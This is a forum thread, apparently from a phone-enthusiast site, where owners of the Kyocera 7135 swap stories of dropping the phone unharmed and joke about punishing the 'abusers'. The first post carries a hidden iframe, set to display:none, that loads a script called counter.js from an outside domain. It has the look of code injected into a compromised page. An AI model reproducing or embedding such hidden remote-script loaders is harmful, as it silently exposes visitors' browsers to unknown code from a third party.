+ Reply to Thread
Page 1 of 3 1 2 3 LastLast

Positive results from an unplanned 7135 "drop test"!

Folks:

Just wanted to let you know the results of a 7135 Drop Test from yesterday ...

... showing the 7135 to a friend suring lunch yesterday, the handset (flip CLOSED) slipped out of my hand! Traveling in a 4.5 - 5 foot arc, it fell on a parquet floor.

Result: NO cosmetic damage and NO malfunction (at least for now).

Now kids -- if you disbelieve my results of this Drop Test, feel free to replicate the experiment for yourselves!

<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Positive results from an unplanned 7135 "drop test"!

Originally posted by Otter

Now kids -- if you disbelieve my results of this Drop Test, feel free to replicate the experiment for yourselves!

I'll take your word for it.
    If at first you don't succeed, don't try sky diving.

Glad it went well for you. I'm going from 3 to 1 with this phone so I am very cognizant about handling the 7135 as I did my Palm. I'd drop, throw, and ruthlessly abuse my phone and pager and they always kept working. My Palm was my baby so I kept it out of harms way.

Originally posted by Beryl
    My Palm was my baby so I kept it out of harms way.
    Ditto. One time, about a month after I'd received my long-awaited first Visor (I'm sensing a pattern here), I went to a tech conference, and was given a sales pitch by some guy selling two-way pagers with rubber around them. He asked to see my Visor for a moment, demonstrated on the pager a "drop test" for me, which was cool, and then proceeded to wonder aloud what would happen if he did the same thing to my Visor! I just barely restrained myself from snatching back my baby and then trying a "drop test" on him! Needless to say, he did not make the sale....

Thanks for sharing the very reassuring results of what must have been a worrisome moment, Otter!

We found a 7135 abuser, may we burn him?

hehe good to hear everythings alright Otter!
    LART 'em all! Let /root grep 'em out!

Folks:

Thanks ... yes I breathed a PHEW! at lunch yesterday. Of course I was glad I didn't drop it on the sidewalk where concrete would've probably created a crater in the new phone!

I dropped mine from waist high onto a supermarket linoleum floor. No problem.

PPC6800 OWNER (ALLTEL SERVICE) GREGHARKINS's Avatar

drop test

Ok I will admit I dropped mine 3 days after i got it while getting out of the car. I had it between my ear and shoulder and stepped out and bam, it hit the running board on the suv and then the ground.

NO DAMAGE and it keep the call, unlike my 6035 the always lost the call if i dropped it.
    GREG HARKINS
    GREGHARKINS@BRINGINGFUNTOYOU.COM
    www.bringingfuntoyou.com

dropped mine in the kitchen (on linoleum ), it was closed, no problems.

Two unplanned drop tests of my 7135.... one dropped from 2' to hardwood floor this weekend, no sweat.

Tonight while getting out of the car from the front seat, the phone slipped out of my pocket. Dropped to the cobblestone street, and skidded to the front tire of the car (through the ice in the street, with the air temp at +5F). I checked the external caller ID and the backlight was on with the last called number showing, which was odd... the phone wasn't don't anything when it was dropped. No external damage/scratches, so I opened the clamshell. Blank. No backlighting, no response... Heart racing...

Soft reset and all better. Everything is fine. It's a happy night The 7135 is indeed built like a tank!

http://mikewren.com

Mine has bounced off of everything from carpet to concrete. The concrete scratched it good as it was a harsh impact.

Administrator
    hotysnc, i bet yours is "worn well"...

OMG Six confirmed 7135 phone abusers! you all need to get a lil security cable or somehting hooked to the phone!

lol

Thanks for sharing your "results" with the gang everyones been luck so far.. I just dont want to see any scary 7135 photos with cracked screens :o
    iPhone therefore iAm.

Dropped 3 feet on tile ladies' room floor. Still tickin'.

Stop it all of you. If I drop it tonight on the way home I'm blaming all of you. I have to say that I'm a little OC about my phone. I won't even put it in my side coat pocket for fear it will slip out. Inside pocket with the zipper closed.

Seriously, you all are scaring me. Somebody call CPS on these people. We all waited too long to see a fatality this early. I'm glad this phone is built to withstand the occassional accident.

Originally posted by I_Machine
    We found a 7135 abuser, may we burn him?
    Nay. Holdeth thine wrath.

First we must dunk the abuser in water to see if they be floaters or sinkers.

Should they be a sinker, then they were not an abuser, but merely havest been possessed by a vile and evil spirit.

If they be a floater, then we sentence them to a life of purgatory - and asign them the ultimate in cruel punishments ... giving them my Nokia 5190 on Cingular.

Can I have their 7135 after they sink?
    ~'kito
    pdaPhoneHome Moderator

What if they weigh the same as a duck?

Then they're made of wood... If they're made of wood that means they can't talk on a phone! Can I have their 7135 after we burn them?
    --Jason
    -----------------------------------------------
    phone@blamecanada.net

Burning seems so messy...can we build a bridge out of them? Then we can stand on it with (formerly) their 7135s and go "Can you hear me now?" :p